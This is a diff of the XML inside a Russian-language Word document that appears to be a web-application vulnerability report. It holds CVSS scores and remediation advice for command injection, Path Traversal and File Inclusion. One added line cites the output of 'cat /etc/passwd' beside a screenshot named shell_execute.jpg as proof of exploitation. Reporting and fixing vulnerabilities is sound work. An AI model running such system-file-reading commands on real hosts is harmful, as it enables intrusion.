+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="af6"/>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Результат команды </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>cat /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>passwd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="af6"/>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5840272" cy="746760"/>
+            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
+            <wp:docPr id="10" name="Рисунок 10"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="10" name="shell_execute.jpg"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId89" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5859425" cy="749209"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="af6"/>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="af6"/>
         <w:ind w:firstLine="709"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -19704,7 +20314,7 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="22" w:name="_Toc158883778"/>
+      <w:bookmarkStart w:id="21" w:name="_Toc158883778"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -19713,7 +20323,7 @@
         </w:rPr>
         <w:t>План по устранению</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="22"/>
+      <w:bookmarkEnd w:id="21"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -19725,7 +20335,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="709"/>
         <w:rPr>
@@ -19767,7 +20377,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="709"/>
         <w:rPr>
@@ -19814,7 +20424,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="709"/>
         <w:rPr>
@@ -19829,13 +20439,12 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Базовая оценка 10.0 </w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="709"/>
         <w:jc w:val="both"/>
@@ -19887,12 +20496,21 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>), регулярное обновление и мониторинг безопасности приложения, а также использование принципов минимизации прав доступа и принципов безопасности баз данных.</w:t>
+        <w:t xml:space="preserve">), регулярное обновление и мониторинг </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>безопасности приложения, а также использование принципов минимизации прав доступа и принципов безопасности баз данных.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="709"/>
         <w:jc w:val="both"/>
@@ -19905,7 +20523,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="709"/>
         <w:rPr>
@@ -19938,7 +20556,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="709"/>
         <w:rPr>
@@ -19985,7 +20603,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="709"/>
         <w:rPr>
@@ -20005,7 +20623,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="709"/>
         <w:jc w:val="both"/>
@@ -20088,7 +20706,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="44"/>
@@ -20113,7 +20731,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="44"/>
@@ -20192,7 +20810,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="44"/>
@@ -20271,7 +20889,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="44"/>
@@ -20332,7 +20950,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="44"/>
@@ -20352,7 +20970,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">не храните конфиденциальные данные в </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -20376,7 +20993,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="44"/>
@@ -20437,7 +21054,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="44"/>
@@ -20462,7 +21079,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="709"/>
         <w:jc w:val="both"/>
@@ -20529,7 +21146,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="709"/>
         <w:jc w:val="both"/>
@@ -20542,7 +21159,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="709"/>
         <w:jc w:val="both"/>
@@ -20562,6 +21179,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Path Traversal</w:t>
       </w:r>
       <w:r>
@@ -20576,7 +21194,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="709"/>
         <w:jc w:val="both"/>
@@ -20624,7 +21242,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="709"/>
         <w:jc w:val="both"/>
@@ -20645,7 +21263,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="709"/>
         <w:jc w:val="both"/>
@@ -20702,7 +21320,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="45"/>
@@ -20794,7 +21412,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="45"/>
@@ -20814,7 +21432,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="45"/>
@@ -20834,7 +21452,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="45"/>
@@ -20854,7 +21472,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="45"/>
@@ -20869,7 +21487,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>используйте белый список (</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -20893,7 +21510,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="45"/>
@@ -20931,7 +21548,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="45"/>
@@ -20987,7 +21604,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="709"/>
         <w:jc w:val="both"/>
@@ -21003,6 +21620,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Применение этих методов защиты поможет уменьшить риск успешных атак </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -21044,7 +21662,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="709"/>
         <w:jc w:val="both"/>
@@ -21057,7 +21675,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="709"/>
         <w:jc w:val="both"/>
@@ -21091,7 +21709,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="709"/>
         <w:jc w:val="both"/>
@@ -21139,7 +21757,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="709"/>
         <w:jc w:val="both"/>
@@ -21160,7 +21778,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="709"/>
         <w:jc w:val="both"/>
@@ -21235,7 +21853,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="46"/>
@@ -21255,7 +21873,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="46"/>
@@ -21275,7 +21893,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="46"/>
@@ -21295,7 +21913,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="46"/>
@@ -21310,21 +21928,12 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">предоставляйте только минимальные права доступа приложению и пользователям к системным ресурсам. Ограничьте доступ к системным </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>командам и функциям, которые не являются необходимыми для работы приложения;</w:t>
+        <w:t>предоставляйте только минимальные права доступа приложению и пользователям к системным ресурсам. Ограничьте доступ к системным командам и функциям, которые не являются необходимыми для работы приложения;</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="46"/>
@@ -21398,7 +22007,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="46"/>
@@ -21436,7 +22045,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="46"/>
@@ -21528,7 +22137,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="709"/>
         <w:jc w:val="both"/>
@@ -21544,6 +22153,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Применение этих методов защиты поможет снизить риск успешных атак </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -21603,7 +22213,512 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="af7"/>
+        <w:pStyle w:val="af6"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="af6"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>S</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ource Code Disclosure - File Inclusion</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>Вектор</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> CVSS (</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>AV:N</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:H)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="af6"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Базовая</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>оценка</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 8.8</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="af6"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Защита от атак </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Source</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Code</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Disclosure</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> и </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>File</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Inclusion</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> включает в себя применение различных мер на ур</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>овне приложения, сервера и кода</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="af6"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="47"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="851" w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>и</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
